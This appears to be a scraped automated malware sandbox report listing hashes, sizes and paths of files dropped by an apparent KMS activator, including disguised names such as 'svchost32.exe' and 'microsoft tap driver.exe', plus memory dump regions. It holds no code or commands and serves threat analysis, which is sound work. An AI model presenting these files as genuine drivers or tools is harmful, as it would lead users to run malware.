5f3f77593b1a5bc4e96257a38a8666b1

SHA1
532c981cd1a07ca62c97e9bc5f66fb4def4b2cc0

SHA256
1b18c8baa20838d3115f8d640f57c2d2e9e95d09780ace2067539574215a6d17

SHA512
59b1ac76f5a9a30680da37fc0d4d6aed370fdef189766c64697bfca1ba422a4a6517b94ad1de524e4af83b68f0eb3e9a209315c47b486f22c1849ffd8ec23200

Download Submit
C:\Users\Admin\kms driver.exe
Filesize
46KB

MD5
5f3f77593b1a5bc4e96257a38a8666b1

SHA1
532c981cd1a07ca62c97e9bc5f66fb4def4b2cc0

SHA256
1b18c8baa20838d3115f8d640f57c2d2e9e95d09780ace2067539574215a6d17

SHA512
59b1ac76f5a9a30680da37fc0d4d6aed370fdef189766c64697bfca1ba422a4a6517b94ad1de524e4af83b68f0eb3e9a209315c47b486f22c1849ffd8ec23200

Download Submit
C:\Users\Admin\kmsauto++v1.6.4.exe
Filesize
17.2MB

MD5
f047284bfddc942292d93ed86fdb20fd

SHA1
56dc945674cf4f941cf17a9ac9c1c9718cf9d18e

SHA256
793731bcfd6cc4faf4244e2353d6d068a0720c601117e464f28c6e6e88de5c46

SHA512
2ec58f32b4fc810c41a014415997c35740eea7f901e367494025045c7c4a9ce1b83efbde2143c0566b66f1065bf39b712d4c9dbaa33ce922eb8d8f9f38da4513

Download Submit
C:\Users\Admin\kmsauto++v1.6.4.exe
Filesize
17.2MB

MD5
f047284bfddc942292d93ed86fdb20fd

SHA1
56dc945674cf4f941cf17a9ac9c1c9718cf9d18e

SHA256
793731bcfd6cc4faf4244e2353d6d068a0720c601117e464f28c6e6e88de5c46

SHA512
2ec58f32b4fc810c41a014415997c35740eea7f901e367494025045c7c4a9ce1b83efbde2143c0566b66f1065bf39b712d4c9dbaa33ce922eb8d8f9f38da4513

Download Submit
C:\Users\Admin\microsoft tap driver.exe
Filesize
59KB

MD5
e0b6a8a56069214d6dc31a2c053f73f7

SHA1
3eb13ab2e49014437c904f8ada2d22a85fd503e4

SHA256
4318860735858dab331f918367caf179c21dcae917df8119609d2edf58eaa5f9

SHA512
080409c159559060b898978b36378c848f882e6c033bb0fb8307478ebd346b418aea653627f456f523fd57626b0ce0b26e0fe323541a790c1fc96a33b9e2ed68

Download Submit
C:\Users\Admin\microsoft tap driver.exe
Filesize
59KB

MD5
e0b6a8a56069214d6dc31a2c053f73f7

SHA1
3eb13ab2e49014437c904f8ada2d22a85fd503e4

SHA256
4318860735858dab331f918367caf179c21dcae917df8119609d2edf58eaa5f9

SHA512
080409c159559060b898978b36378c848f882e6c033bb0fb8307478ebd346b418aea653627f456f523fd57626b0ce0b26e0fe323541a790c1fc96a33b9e2ed68

Download Submit
C:\Users\Admin\svchost32.exe
Filesize
533KB

MD5
4ec113ac1f8e7d4dda1270cc8bb00efc

SHA1
7a33598cab86959e8a3001ef0a2a756514de3aed

SHA256
7f43ffc3c653adeff9f3b0395a78ce797d23d1faacc782955387eb276997b0ad

SHA512
28954c19e7f60cd5ee404c4ed27eb85be6d8061b82a27a1aa8b873303350427bcaa081677f44fd6731050b6f184468c1f72739c1ae064034acfa006ec9b63bf2

Download Submit
C:\Users\Admin\svchost32.exe
Filesize
533KB

MD5
4ec113ac1f8e7d4dda1270cc8bb00efc

SHA1
7a33598cab86959e8a3001ef0a2a756514de3aed

SHA256
7f43ffc3c653adeff9f3b0395a78ce797d23d1faacc782955387eb276997b0ad

SHA512
28954c19e7f60cd5ee404c4ed27eb85be6d8061b82a27a1aa8b873303350427bcaa081677f44fd6731050b6f184468c1f72739c1ae064034acfa006ec9b63bf2

Download Submit
memory/992-176-0x0000000000000000-mapping.dmp

Download
memory/1028-175-0x0000000000000000-mapping.dmp

Download
memory/1096-172-0x0000000000000000-mapping.dmp

Download
memory/1504-149-0x00000000021F0000-0x0000000002212000-memory.dmp

Filesize
136KB

Download
memory/1504-132-0x0000000000000000-mapping.dmp

Download
memory/1504-141-0x000000001C970000-0x000000001CA72000-memory.dmp

Filesize
1.0MB

Download
memory/1504-142-0x00007FFC2DFE0000-0x00007FFC2EAA1000-memory.dmp

Filesize
10.8MB

Download
memory/1504-161-0x00007FFC2DFE0000-0x00007FFC2EAA1000-memory.dmp

Filesize
10.8MB

Download
memory/1504-153-0x00000000021C0000-0x00000000021CA000-memory.dmp

Filesize
40KB

Download
memory/1504-136-0x000000001B820000-0x000000001B8A2000-memory.dmp

Filesize
520KB

Download
memory/1504-154-0x00000000021D0000-0x00000000021DA000-memory.dmp

Filesize
40KB

Download
memory/1504-135-0x00000000001A0000-0x00000000001AE000-memory.dmp

Filesize
56KB

Download
memory/1556-186-0x0000000000000000-mapping.dmp

Download
memory/1624-185-0x0000000000000000-mapping.dmp

Download
memory/1628-198-0x0000000000000000-mapping.dmp

Download
memory/1660-167-0x0000000000000000-mapping.dmp

Download
memory/1932-169-0x0000000000000000-mapping.dmp

Download
memory/1980-155-0x0000000000400000-0x0000000001713000-memory.dmp

Filesize
19.1MB

Download
memory/1980-137-0x0000000000000000-mapping.dmp

Download
memory/1980-201-0x0000000000400000-0x0000000001713000-memory.dmp

Filesize
19.1MB

Download
memory/1988-140-0x0000000000000000-mapping.dmp

Download
memory/1988-145-0x0000000000400000-0x000000000041F000-memory.dmp

Filesize
124KB

Download
memory/1988-200-0x0000000000400000-0x000000000041F000-memory.dmp

Filesize
124KB

Download
memory/2020-199-0x0000000000000000-mapping.dmp

Download
memory/2036-159-0x0000000000000000-mapping.dmp

Download
memory/2316-189-0x0000000000000000-mapping.dmp

Download
memory/2376-178-0x0000000000000000-mapping.dmp

Download
memory/2500-177-0x0000000000000000-mapping.dmp

Download
memory/2544-191-0x0000000000000000-mapping.dmp

Download
memory/2780-152-0x0000000000000000-mapping.dmp

Download
memory/2812-184-0x0000000000000000-mapping.dmp

Download
memory/2836-173-0x0000000000000000-mapping.dmp

Download
memory/3056-174-0x0000000000000000-mapping.dmp

Download
memory/3064-183-0x0000000000000000-mapping.dmp

Download
memory/3176-197-0x0000000000000000-mapping.dmp

Download
memory/3264-164-0x0000000000000000-mapping.dmp

Download
memory/3540-162-0x0000000000000000-mapping.dmp

Download
memory/3612-168-0x0000000000000000-mapping.dmp

Download
memory/3676-192-0x0000000000000000-mapping.dmp

Download
memory/3796-187-0x0000000000000000-mapping.dmp

Download
memory/3804-171-0x0000000000000000-mapping.dmp

Download
memory/4004-156-0x0000000000000000-mapping.dmp

Download
memory/4196-179-0x0000000000000000-mapping.dmp

Download
memory/4264-188-0x0000000000000000-mapping.dmp

Download
memory/4360-163-0x0000000000000000-mapping.dmp

Download
memory/4372-182-0x0000000000000000-mapping.dmp

Download
memory/4388-196-0x0000000000000000-mapping.dmp

Download
memory/4460-190-0x0000000000000000-mapping.dmp

Download
memory/4500-165-0x0000000000983000-0x00000000009E6000-memory.dmp

Filesize
396KB

Download
memory/4500-166-0x0000000000890000-0x00000000008FD000-memory.dmp

Filesize
436KB

Download
memory/4500-148-0x0000000000000000-mapping.dmp

Download
memory/4500-170-0x0000000000400000-0x0000000000886000-memory.dmp

Filesize
4.5MB

Download
memory/4680-193-0x0000000000000000-mapping.dmp

Download
memory/4808-195-0x0000000000000000-mapping.dmp

Download
memory/4828-180-0x0000000000000000-mapping.dmp

Download
memory/4904-147-0x0000000000000000-mapping.dmp

Download
memory/4908-146-0x0000000000000000-mapping.dmp

Download
memory/5092-194-0x0000000000000000-mapping.dmp

Download
memory/5100-181-0x0000000000000000-mapping.dmp

Download